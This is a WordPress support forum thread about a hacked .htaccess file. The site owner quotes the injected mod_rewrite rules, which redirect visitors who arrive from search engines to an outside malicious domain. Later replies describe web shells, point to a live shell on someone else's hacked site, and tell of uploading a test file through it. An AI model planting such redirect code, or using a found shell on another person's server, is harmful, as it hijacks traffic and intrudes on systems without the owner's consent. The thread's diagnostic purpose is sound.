Wp .htaccess is hacked for the 2nd time

  • Hello,

    I’m using the latest version of wp. ie., v3.2.1
    Site hosted in Godaddy hosting.

    Previously my wp .htaccess was modified by someone,
    I removed the code and now again it’s modified with the same code.
    This code redirects my search engine traffic to some other website.

    I have mentioned about this previously here:
    https://www.wpsecuritylock.com/wordpress-3-2-gershwin-is-released/comment-page-1/#comment-4687
    I really don’t know how it’s been done.

    Please advise me how to prevent this from happening again.

    <IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http : // sokoloperkovuskeci . com / in . php ? g = 56 [R,L]
</IfModule>
Viewing 4 replies - 46 through 49 (of 49 total)

  • And this is interesting if you want to see a hackers Shell script.
    https://www.myphotofolio.co.uk/myid.php

    Normally the Shell is hidden on a hacked site and you will see a 403 Forbidden error (the hackers add their own .htaccess file that only allows them access to the Shell script by IP Address or Host Name), but this one is exposed. Usually you will only see this for a couple of days before the site owner figures it out or their site gets banned.

    Thanks – I’ll keep looking.

    I have also found out since that whatever script they uploaded has altered or replaced every .htaccess file of every site under that FTP account, not just the one WordPress blog. That includes a Drupal multisite with about 40 domains on it, and probably another 30 sites or so of all different kinds. D-:

    Now I don’t even know for certain if it even started with the WordPress blog, or somewhere else. The script could be anywhere…

    Well if you look at the ShOcKeR Area shell script above on this currently hacked website above you can see some of the things then can do with your website and your entire hosting account – pretty much anything they want – that is where the hacker term “owned” comes from. ??

    And yes the Shell scripts can be anywhere and the more advanced hacking scripts and hackers use a lot of autogeneration and remote generation scripts. that is what makes de-hacking so time consuming. you have to lock everything down and then set up monitoring and then start dissecting. as new scripts are created you need to find the source of the autogeneration scripts. it can be a really time consuming event / project.

    And just to see if this Shell is really active or not i uploaded a file to this website. created a text file called test.txt and it was uploaded to this site successfully so this Shell script is fully functioning.
    44235189 -rw-r–r– 1 u40191717 ftpusers 4 Dec 3 20:35 test.txt

    https://www.myphotofolio.co.uk/test.txt

Viewing 4 replies - 46 through 49 (of 49 total)
  • The topic ‘Wp .htaccess is hacked for the 2nd time’ is closed to new replies.